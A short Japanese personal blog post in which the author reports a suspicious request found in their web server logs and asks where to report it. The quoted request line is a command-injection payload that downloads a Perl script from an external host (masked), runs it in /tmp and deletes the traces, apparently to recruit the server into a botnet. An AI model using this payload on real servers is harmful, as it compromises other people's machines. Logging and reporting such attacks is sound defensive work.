メニュー 蕭寥亭 検索

開店休業の記

ちょっと危険な気がします

 昨日、今日とまた新手の不審アクセスが。今回はこんなんです(↓)。

    GET /7200http://※※※※/1?&cmd=cd+/tmp;GET+http://※※※※/borek.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1

 「※※※※」の部分には実在のURLが指定されていました。

 試しにリクエストにある borek.txt というのをダウンロードしてみたら(怖いもの知らずだのぅ・・・)、perl のスクリプトでした。サーバーのボット化狙いでしょうか?

 こういうのって、どこかに通報した方が良いような気がするのですが、どこにしたらいいんだろ?